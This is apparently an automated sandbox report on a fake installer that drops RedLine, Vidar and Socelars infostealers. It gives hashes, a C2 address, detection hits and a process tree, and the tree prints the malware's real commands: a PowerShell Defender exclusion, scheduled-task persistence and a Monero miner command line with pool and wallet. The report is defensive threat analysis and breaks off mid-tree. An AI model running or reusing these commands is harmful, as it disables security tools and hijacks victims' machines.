redline | 56a461a6cc8ad9c10cdc1d19a12d5deceb9ebefb0c871a3fc2eb83c466947a11

Target

setup_x86_x64_install.exe
Size

4.0MB
MD5

73491325fde5366b31c09da701d07dd6
SHA1

a4e1ada57e590c2df30fc26fad5f3ca57ad922b1
SHA256

56a461a6cc8ad9c10cdc1d19a12d5deceb9ebefb0c871a3fc2eb83c466947a11
SHA512

28b5008c542e9c486529934f74774d6d2de4b98531483b24c3c7cf82bf2214b959a1feb0085014026dd278d2a18ac6ae8a0e5a7ebb36be28abf6dccbf2d38e88

Score

10^/10

redline socelars vidar janesam aspackv2 evasion infostealer persistence stealer suricata themida trojan

Malware Config

Extracted

Family

redline

Botnet

janesam

65.108.20.195:6774

Signatures

Modifies Windows Defender Real-time Protection settings 3 TTPs
evasion trojan

Modify Registry
T1112

Modify Existing Service
T1031

Disabling Security Tools
T1089

Process spawned unexpected child process 3 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

description	pid	pid_target	Process	procid_target
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	5560	4936	rundll32.exe	7
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3188	4936	rundll32.exe	7
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3900	4936	rundll32.exe	7

RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
infostealer redline

RedLine Payload 2 IoCs

resource	yara_rule
behavioral4/memory/4108-296-0x0000000005650000-0x000000000566D000-memory.dmp	family_redline
behavioral4/memory/4932-547-0x00000000051C0000-0x00000000057D8000-memory.dmp	family_redline

Socelars
Socelars is an infostealer targeting browser cookies and credit card credentials.
stealer socelars

Socelars Payload 2 IoCs

resource	yara_rule
behavioral4/files/0x000100000002b1cb-178.dat	family_socelars
behavioral4/files/0x000100000002b1cb-210.dat	family_socelars

Suspicious use of NtCreateProcessExOtherParentProcess 3 IoCs

description	pid	Process	procid_target
PID 5820 created 5584	5820	WerFault.exe	121
PID 5948 created 4712	5948	Process not Found	95
PID 5864 created 4168	5864	WerFault.exe	108

Vidar
Vidar is an infostealer based on Arkei stealer.
stealer vidar
suricata: ET MALWARE JS/Nemucod requesting EXE payload 2016-02-01
suricata: ET MALWARE JS/Nemucod requesting EXE payload 2016-02-01
suricata
suricata: ET MALWARE JS/Nemucod.M.gen downloading EXE payload
suricata: ET MALWARE JS/Nemucod.M.gen downloading EXE payload
suricata
suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile
suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile
suricata

Vidar Stealer 2 IoCs

stealer

resource	yara_rule
behavioral4/memory/2784-341-0x0000000000AE0000-0x0000000000BB4000-memory.dmp	family_vidar
behavioral4/memory/5752-363-0x0000000004DD0000-0x00000000053E8000-memory.dmp	family_vidar

ASPack v2.12-2.42 7 IoCs

Detects executables packed with ASPack v2.12-2.42

aspackv2

resource	yara_rule
behavioral4/files/0x000100000002b1c2-157.dat	aspack_v212_v242
behavioral4/files/0x000100000002b1c2-160.dat	aspack_v212_v242
behavioral4/files/0x000100000002b1c4-164.dat	aspack_v212_v242
behavioral4/files/0x000100000002b1c1-166.dat	aspack_v212_v242
behavioral4/files/0x000100000002b1c1-165.dat	aspack_v212_v242
behavioral4/files/0x000100000002b1c4-163.dat	aspack_v212_v242
behavioral4/files/0x000100000002b1c1-158.dat	aspack_v212_v242

Blocklisted process makes network request 1 IoCs

flow	pid	Process
35	4884	schtasks.exe

Downloads MZ/PE file

Executes dropped EXE 24 IoCs

pid	Process
4328	Conhost.exe
4112	setup_install.exe
2264	Sun1917b8fb5f09db8.exe
4168	Sun19de8ff4b6aefeb8.exe
4712	Sun1908b94df837b3158.exe
5108	Sun19262b9e49ad.exe
580	Sun193fda712d9f1.exe
1040	svchost.exe
4108	Sun195a1614ec24e6a.exe
4884	schtasks.exe
2784	Sun19eb40faaaa9.exe
660	Sun198361825f4.exe
4216	Sun1905815e51282417.exe
2164	Sun1966fb31dd5a07.exe
3552	Sun1966fb31dd5a07.tmp
4124	Ze2ro.exe
5216	1745076.scr
5344	LzmwAqmV.exe
5628	6169110.scr
5692	2409670.scr
5884	Chrome 5.exe
6032	PublicDwlBrowser1100.exe
5164	2.exe
5300	msedge.exe

Sets service image path in registry 2 TTPs
persistence

Registry Run Keys / Startup Folder
T1060

Modify Registry
T1112

Loads dropped DLL 8 IoCs

pid	Process
4112	setup_install.exe
4112	setup_install.exe
4112	setup_install.exe
4112	setup_install.exe
4112	setup_install.exe
4112	setup_install.exe
3552	Sun1966fb31dd5a07.tmp
5584	rundll32.exe

Themida packer 4 IoCs

Detects Themida, an advanced Windows software protection system.

themida

resource	yara_rule
behavioral4/files/0x0022000000007767-289.dat	themida
behavioral4/files/0x0022000000007767-308.dat	themida
behavioral4/files/0x000500000001ff74-327.dat	themida
behavioral4/files/0x000500000001ff74-335.dat	themida

Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102

Looks up external IP address via web service 6 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
3	ip-api.com
3	ipinfo.io
45	ipinfo.io
56	ipinfo.io
109	ipinfo.io
141	ipinfo.io

Drops file in Windows directory 7 IoCs

description	ioc	Process
File opened for modification	C:\Windows\SoftwareDistribution\ReportingEvents.log	svchost.exe
File created	C:\Windows\AppCompat\Programs\Amcache.hve.tmp	WerFault.exe
File opened for modification	C:\Windows\WindowsUpdate.log	svchost.exe
File opened for modification	C:\Windows\SoftwareDistribution\DataStore\Logs\edb.chk	svchost.exe
File opened for modification	C:\Windows\SoftwareDistribution\DataStore\Logs\edb.log	svchost.exe
File opened for modification	C:\Windows\SoftwareDistribution\DataStore\DataStore.edb	svchost.exe
File opened for modification	C:\Windows\SoftwareDistribution\DataStore\DataStore.jfm	svchost.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Program crash 24 IoCs

pid	pid_target	Process	procid_target
6068	4712	WerFault.exe	95
6112	5584	WerFault.exe	121
2352	4168	WerFault.exe	108
5504	5108	WerFault.exe	104
4808	5692	WerFault.exe	124
1488	5692	WerFault.exe	124
3224	784	WerFault.exe	148
5808	5164	WerFault.exe	138
1132	1616	WerFault.exe	143
2008	6016	WerFault.exe	145
3924	1560	WerFault.exe	157
5588	5212	WerFault.exe	221
2944	5212	WerFault.exe	221
2960	1164	WerFault.exe	245
3612	1164	WerFault.exe	245
1144	2804	WerFault.exe	173
648	1720	WerFault.exe	260
7024	4356	WerFault.exe	258
2576	6668	WerFault.exe	320
1992	5832	WerFault.exe	326
5380	4720	WerFault.exe	359
3116	4604	WerFault.exe	370
5436	5556	WerFault.exe	388
6320	2952	WerFault.exe	382

Checks processor information in registry 2 TTPs 2 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\Registry\Machine\HARDWARE\DESCRIPTION\System\CentralProcessor\0	svchost.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	svchost.exe

Creates scheduled task(s) 1 TTPs 6 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task

T1053

pid	Process
1144	schtasks.exe
4884	schtasks.exe
5636	schtasks.exe
2788	schtasks.exe
1300	schtasks.exe
1480	schtasks.exe

Delays execution with timeout.exe 2 IoCs

evasion

pid	Process
2556	timeout.exe
2472	timeout.exe

Kills process with taskkill 1 IoCs

evasion

pid	Process
1708	taskkill.exe

Modifies data under HKEY_USERS 41 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs	WaaSMedicAgent.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs	WaaSMedicAgent.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs	WaaSMedicAgent.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs	WaaSMedicAgent.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates	WaaSMedicAgent.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs	WaaSMedicAgent.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs	WaaSMedicAgent.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs	WaaSMedicAgent.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs	WaaSMedicAgent.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA	WaaSMedicAgent.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates	WaaSMedicAgent.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs	WaaSMedicAgent.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed	WaaSMedicAgent.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates	WaaSMedicAgent.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs	WaaSMedicAgent.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust	WaaSMedicAgent.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs	WaaSMedicAgent.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot	WaaSMedicAgent.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates	WaaSMedicAgent.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs	WaaSMedicAgent.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates	WaaSMedicAgent.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates	WaaSMedicAgent.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates	WaaSMedicAgent.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs	WaaSMedicAgent.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	WaaSMedicAgent.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs	WaaSMedicAgent.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed	WaaSMedicAgent.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates	WaaSMedicAgent.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates	WaaSMedicAgent.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs	WaaSMedicAgent.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs	WaaSMedicAgent.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs	WaaSMedicAgent.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates	WaaSMedicAgent.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople	WaaSMedicAgent.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople	WaaSMedicAgent.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs	WaaSMedicAgent.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA	WaaSMedicAgent.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs	WaaSMedicAgent.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs	WaaSMedicAgent.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust	WaaSMedicAgent.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root	WaaSMedicAgent.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
3900	powershell.exe
3900	powershell.exe
3900	powershell.exe
2264	Sun1917b8fb5f09db8.exe
2264	Sun1917b8fb5f09db8.exe
2264	Sun1917b8fb5f09db8.exe
2264	Sun1917b8fb5f09db8.exe
2264	Sun1917b8fb5f09db8.exe
2264	Sun1917b8fb5f09db8.exe
2264	Sun1917b8fb5f09db8.exe
2264	Sun1917b8fb5f09db8.exe
2264	Sun1917b8fb5f09db8.exe
2264	Sun1917b8fb5f09db8.exe
2264	Sun1917b8fb5f09db8.exe
2264	Sun1917b8fb5f09db8.exe
2264	Sun1917b8fb5f09db8.exe
2264	Sun1917b8fb5f09db8.exe
2264	Sun1917b8fb5f09db8.exe
2264	Sun1917b8fb5f09db8.exe
2264	Sun1917b8fb5f09db8.exe
2264	Sun1917b8fb5f09db8.exe
2264	Sun1917b8fb5f09db8.exe
2264	Sun1917b8fb5f09db8.exe
2264	Sun1917b8fb5f09db8.exe
2264	Sun1917b8fb5f09db8.exe
2264	Sun1917b8fb5f09db8.exe
2264	Sun1917b8fb5f09db8.exe
2264	Sun1917b8fb5f09db8.exe
2264	Sun1917b8fb5f09db8.exe
2264	Sun1917b8fb5f09db8.exe
2264	Sun1917b8fb5f09db8.exe
2264	Sun1917b8fb5f09db8.exe
2264	Sun1917b8fb5f09db8.exe
2264	Sun1917b8fb5f09db8.exe
2264	Sun1917b8fb5f09db8.exe
2264	Sun1917b8fb5f09db8.exe
2264	Sun1917b8fb5f09db8.exe
2264	Sun1917b8fb5f09db8.exe
2264	Sun1917b8fb5f09db8.exe
2264	Sun1917b8fb5f09db8.exe
2264	Sun1917b8fb5f09db8.exe
2264	Sun1917b8fb5f09db8.exe
2264	Sun1917b8fb5f09db8.exe
2264	Sun1917b8fb5f09db8.exe
2264	Sun1917b8fb5f09db8.exe
2264	Sun1917b8fb5f09db8.exe
2264	Sun1917b8fb5f09db8.exe
2264	Sun1917b8fb5f09db8.exe
2264	Sun1917b8fb5f09db8.exe
2264	Sun1917b8fb5f09db8.exe
2264	Sun1917b8fb5f09db8.exe
2264	Sun1917b8fb5f09db8.exe
2264	Sun1917b8fb5f09db8.exe
2264	Sun1917b8fb5f09db8.exe
2264	Sun1917b8fb5f09db8.exe
2264	Sun1917b8fb5f09db8.exe
2264	Sun1917b8fb5f09db8.exe
2264	Sun1917b8fb5f09db8.exe
2264	Sun1917b8fb5f09db8.exe
2264	Sun1917b8fb5f09db8.exe
2264	Sun1917b8fb5f09db8.exe
2264	Sun1917b8fb5f09db8.exe
2264	Sun1917b8fb5f09db8.exe
2264	Sun1917b8fb5f09db8.exe

Suspicious use of AdjustPrivilegeToken 51 IoCs

description	pid	Process
Token: SeShutdownPrivilege	4644	svchost.exe
Token: SeCreatePagefilePrivilege	4644	svchost.exe
Token: SeShutdownPrivilege	4644	svchost.exe
Token: SeCreatePagefilePrivilege	4644	svchost.exe
Token: SeShutdownPrivilege	4644	svchost.exe
Token: SeCreatePagefilePrivilege	4644	svchost.exe
Token: SeShutdownPrivilege	3268	svchost.exe
Token: SeCreatePagefilePrivilege	3268	svchost.exe
Token: SeCreateTokenPrivilege	5108	Sun19262b9e49ad.exe
Token: SeAssignPrimaryTokenPrivilege	5108	Sun19262b9e49ad.exe
Token: SeLockMemoryPrivilege	5108	Sun19262b9e49ad.exe
Token: SeIncreaseQuotaPrivilege	5108	Sun19262b9e49ad.exe
Token: SeMachineAccountPrivilege	5108	Sun19262b9e49ad.exe
Token: SeTcbPrivilege	5108	Sun19262b9e49ad.exe
Token: SeSecurityPrivilege	5108	Sun19262b9e49ad.exe
Token: SeTakeOwnershipPrivilege	5108	Sun19262b9e49ad.exe
Token: SeLoadDriverPrivilege	5108	Sun19262b9e49ad.exe
Token: SeSystemProfilePrivilege	5108	Sun19262b9e49ad.exe
Token: SeSystemtimePrivilege	5108	Sun19262b9e49ad.exe
Token: SeProfSingleProcessPrivilege	5108	Sun19262b9e49ad.exe
Token: SeIncBasePriorityPrivilege	5108	Sun19262b9e49ad.exe
Token: SeCreatePagefilePrivilege	5108	Sun19262b9e49ad.exe
Token: SeCreatePermanentPrivilege	5108	Sun19262b9e49ad.exe
Token: SeBackupPrivilege	5108	Sun19262b9e49ad.exe
Token: SeRestorePrivilege	5108	Sun19262b9e49ad.exe
Token: SeShutdownPrivilege	5108	Sun19262b9e49ad.exe
Token: SeDebugPrivilege	5108	Sun19262b9e49ad.exe
Token: SeAuditPrivilege	5108	Sun19262b9e49ad.exe
Token: SeSystemEnvironmentPrivilege	5108	Sun19262b9e49ad.exe
Token: SeChangeNotifyPrivilege	5108	Sun19262b9e49ad.exe
Token: SeRemoteShutdownPrivilege	5108	Sun19262b9e49ad.exe
Token: SeUndockPrivilege	5108	Sun19262b9e49ad.exe
Token: SeSyncAgentPrivilege	5108	Sun19262b9e49ad.exe
Token: SeEnableDelegationPrivilege	5108	Sun19262b9e49ad.exe
Token: SeManageVolumePrivilege	5108	Sun19262b9e49ad.exe
Token: SeImpersonatePrivilege	5108	Sun19262b9e49ad.exe
Token: SeCreateGlobalPrivilege	5108	Sun19262b9e49ad.exe
Token: 31	5108	Sun19262b9e49ad.exe
Token: 32	5108	Sun19262b9e49ad.exe
Token: 33	5108	Sun19262b9e49ad.exe
Token: 34	5108	Sun19262b9e49ad.exe
Token: 35	5108	Sun19262b9e49ad.exe
Token: SeDebugPrivilege	4884	schtasks.exe
Token: SeDebugPrivilege	1040	svchost.exe
Token: SeDebugPrivilege	3900	powershell.exe
Token: SeDebugPrivilege	4108	Sun195a1614ec24e6a.exe
Token: SeDebugPrivilege	660	Sun198361825f4.exe
Token: SeDebugPrivilege	5216	1745076.scr
Token: SeRestorePrivilege	6068	WerFault.exe
Token: SeBackupPrivilege	6068	WerFault.exe
Token: SeBackupPrivilege	6068	WerFault.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 3268 wrote to memory of 1104	3268	svchost.exe	81
PID 3268 wrote to memory of 1104	3268	svchost.exe	81
PID 3892 wrote to memory of 4328	3892	setup_x86_x64_install.exe	233
PID 3892 wrote to memory of 4328	3892	setup_x86_x64_install.exe	233
PID 3892 wrote to memory of 4328	3892	setup_x86_x64_install.exe	233
PID 4328 wrote to memory of 4112	4328	Conhost.exe	83
PID 4328 wrote to memory of 4112	4328	Conhost.exe	83
PID 4328 wrote to memory of 4112	4328	Conhost.exe	83
PID 4112 wrote to memory of 1948	4112	setup_install.exe	88
PID 4112 wrote to memory of 1948	4112	setup_install.exe	88
PID 4112 wrote to memory of 1948	4112	setup_install.exe	88
PID 4112 wrote to memory of 1520	4112	setup_install.exe	114
PID 4112 wrote to memory of 1520	4112	setup_install.exe	114
PID 4112 wrote to memory of 1520	4112	setup_install.exe	114
PID 4112 wrote to memory of 2152	4112	setup_install.exe	89
PID 4112 wrote to memory of 2152	4112	setup_install.exe	89
PID 4112 wrote to memory of 2152	4112	setup_install.exe	89
PID 4112 wrote to memory of 2376	4112	setup_install.exe	113
PID 4112 wrote to memory of 2376	4112	setup_install.exe	113
PID 4112 wrote to memory of 2376	4112	setup_install.exe	113
PID 4112 wrote to memory of 2560	4112	setup_install.exe	195
PID 4112 wrote to memory of 2560	4112	setup_install.exe	195
PID 4112 wrote to memory of 2560	4112	setup_install.exe	195
PID 4112 wrote to memory of 2996	4112	setup_install.exe	91
PID 4112 wrote to memory of 2996	4112	setup_install.exe	91
PID 4112 wrote to memory of 2996	4112	setup_install.exe	91
PID 4112 wrote to memory of 3112	4112	setup_install.exe	112
PID 4112 wrote to memory of 3112	4112	setup_install.exe	112
PID 4112 wrote to memory of 3112	4112	setup_install.exe	112
PID 4112 wrote to memory of 3388	4112	setup_install.exe	92
PID 4112 wrote to memory of 3388	4112	setup_install.exe	92
PID 4112 wrote to memory of 3388	4112	setup_install.exe	92
PID 4112 wrote to memory of 1720	4112	setup_install.exe	260
PID 4112 wrote to memory of 1720	4112	setup_install.exe	260
PID 4112 wrote to memory of 1720	4112	setup_install.exe	260
PID 1948 wrote to memory of 3900	1948	cmd.exe	93
PID 1948 wrote to memory of 3900	1948	cmd.exe	93
PID 1948 wrote to memory of 3900	1948	cmd.exe	93
PID 4112 wrote to memory of 4036	4112	setup_install.exe	110
PID 4112 wrote to memory of 4036	4112	setup_install.exe	110
PID 4112 wrote to memory of 4036	4112	setup_install.exe	110
PID 4112 wrote to memory of 4224	4112	setup_install.exe	142
PID 4112 wrote to memory of 4224	4112	setup_install.exe	142
PID 4112 wrote to memory of 4224	4112	setup_install.exe	142
PID 1520 wrote to memory of 2264	1520	cmd.exe	94
PID 1520 wrote to memory of 2264	1520	cmd.exe	94
PID 1520 wrote to memory of 2264	1520	cmd.exe	94
PID 4112 wrote to memory of 3828	4112	setup_install.exe	107
PID 4112 wrote to memory of 3828	4112	setup_install.exe	107
PID 4112 wrote to memory of 3828	4112	setup_install.exe	107
PID 3112 wrote to memory of 4168	3112	cmd.exe	108
PID 3112 wrote to memory of 4168	3112	cmd.exe	108
PID 3112 wrote to memory of 4168	3112	cmd.exe	108
PID 2996 wrote to memory of 4712	2996	cmd.exe	95
PID 2996 wrote to memory of 4712	2996	cmd.exe	95
PID 2996 wrote to memory of 4712	2996	cmd.exe	95
PID 4112 wrote to memory of 4592	4112	setup_install.exe	106
PID 4112 wrote to memory of 4592	4112	setup_install.exe	106
PID 4112 wrote to memory of 4592	4112	setup_install.exe	106
PID 2560 wrote to memory of 1040	2560	Conhost.exe	234
PID 2560 wrote to memory of 1040	2560	Conhost.exe	234
PID 2376 wrote to memory of 580	2376	cmd.exe	105
PID 2376 wrote to memory of 580	2376	cmd.exe	105
PID 2152 wrote to memory of 5108	2152	cmd.exe	104

C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install.exe
"C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:3892
- C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
  "C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"
  2⤵
  PID:4328
- - C:\Users\Admin\AppData\Local\Temp\7zS8E04AA71\setup_install.exe
    "C:\Users\Admin\AppData\Local\Temp\7zS8E04AA71\setup_install.exe"
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    - Suspicious use of WriteProcessMemory
    PID:4112
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"
      4⤵
      Suspicious use of WriteProcessMemory
      PID:1948
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"
        5⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:3900
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c Sun19262b9e49ad.exe
      4⤵
      Suspicious use of WriteProcessMemory
      PID:2152
    - - C:\Users\Admin\AppData\Local\Temp\7zS8E04AA71\Sun19262b9e49ad.exe
        
        Sun19262b9e49ad.exe
        5⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:5108
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 5108 -s 2008
        6⤵
        Program crash
        
        PID:5504
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c Sun19e4ade31b2a.exe
      4⤵
      PID:2560
    - - C:\Users\Admin\AppData\Local\Temp\7zS8E04AA71\Sun19e4ade31b2a.exe
        
        Sun19e4ade31b2a.exe
        5⤵
        
        PID:1040
      - C:\Users\Admin\AppData\Roaming\1745076.scr
        
        "C:\Users\Admin\AppData\Roaming\1745076.scr" /S
        6⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:5216
      - C:\Users\Admin\AppData\Roaming\6169110.scr
        
        "C:\Users\Admin\AppData\Roaming\6169110.scr" /S
        6⤵
        Executes dropped EXE
        
        PID:5628
      - C:\Users\Admin\AppData\Roaming\2409670.scr
        
        "C:\Users\Admin\AppData\Roaming\2409670.scr" /S
        6⤵
        Executes dropped EXE
        
        PID:5692
        
        C:\Users\Admin\AppData\Roaming\2409670.scr
        
        "C:\Users\Admin\AppData\Roaming\2409670.scr"
        7⤵
        
        PID:5752
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 5692 -s 1076
        7⤵
        Program crash
        
        PID:4808
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 5692 -s 1076
        7⤵
        Program crash
        
        PID:1488
      - C:\Users\Admin\AppData\Roaming\1171444.scr
        
        "C:\Users\Admin\AppData\Roaming\1171444.scr" /S
        6⤵
        
        PID:5300
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c Sun1908b94df837b3158.exe
      4⤵
      Suspicious use of WriteProcessMemory
      PID:2996
    - - C:\Users\Admin\AppData\Local\Temp\7zS8E04AA71\Sun1908b94df837b3158.exe
        
        Sun1908b94df837b3158.exe
        5⤵
        Executes dropped EXE
        
        PID:4712
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4712 -s 264
        6⤵
        Drops file in Windows directory
        Program crash
        Suspicious use of AdjustPrivilegeToken
        
        PID:6068
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c Sun191101c1aaa.exe
      4⤵
      PID:3388
    - - C:\Users\Admin\AppData\Local\Temp\7zS8E04AA71\Sun191101c1aaa.exe
        
        Sun191101c1aaa.exe
        5⤵
        
        PID:4884
      - C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe
        
        "C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"
        6⤵
        Executes dropped EXE
        
        PID:5344
        
        C:\Users\Admin\AppData\Local\Temp\Chrome 5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Chrome 5.exe"
        7⤵
        Executes dropped EXE
        
        PID:5884
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit
        8⤵
        
        PID:5456
        
        C:\Windows\system32\schtasks.exe
        
        schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'
        9⤵
        Creates scheduled task(s)
        
        PID:1300
        
        C:\Users\Admin\AppData\Roaming\services64.exe
        
        "C:\Users\Admin\AppData\Roaming\services64.exe"
        8⤵
        
        PID:1516
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit
        9⤵
        
        PID:1784
        
        C:\Windows\system32\schtasks.exe
        
        schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'
        10⤵
        Blocklisted process makes network request
        Executes dropped EXE
        Creates scheduled task(s)
        Suspicious use of AdjustPrivilegeToken
        
        PID:4884
        
        C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe
        
        "C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"
        9⤵
        
        PID:6096
        
        C:\Windows\explorer.exe
        
        C:\Windows\explorer.exe --cinit-find-x -B --algo=rx/0 --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr-eu2.nanopool.org:14433 --user=41o1Bi5waqLgbkV653RD7zSYeXSWRu1wnEDzPgFDFwntSnuRx7g4HbHPqNDGS6BW1bget6yyHyrPbBcVsdR6Ebxd843bMuK.add/password --pass= --cpu-max-threads-hint=30 --cinit-remote-config="v4Qq47ngFyBcSyO2uLKc6O4DG/ZgkwoY7/pmBv4ks3wJ7PR9JPsLklOJLkitFc6Y" --cinit-idle-wait=5 --cinit-idle-cpu=70 --tls --cinit-stealth
        9⤵
        
        PID:6156
        
        C:\Users\Admin\AppData\Local\Temp\PublicDwlBrowser1100.exe
        
        "C:\Users\Admin\AppData\Local\Temp\PublicDwlBrowser1100.exe"
        7⤵
        Executes dropped EXE
        
        PID:6032
        
        C:\ProgramData\4908509.exe
        
        "C:\ProgramData\4908509.exe"
        8⤵
        
        PID:5832
        
        C:\ProgramData\7553059.exe
        
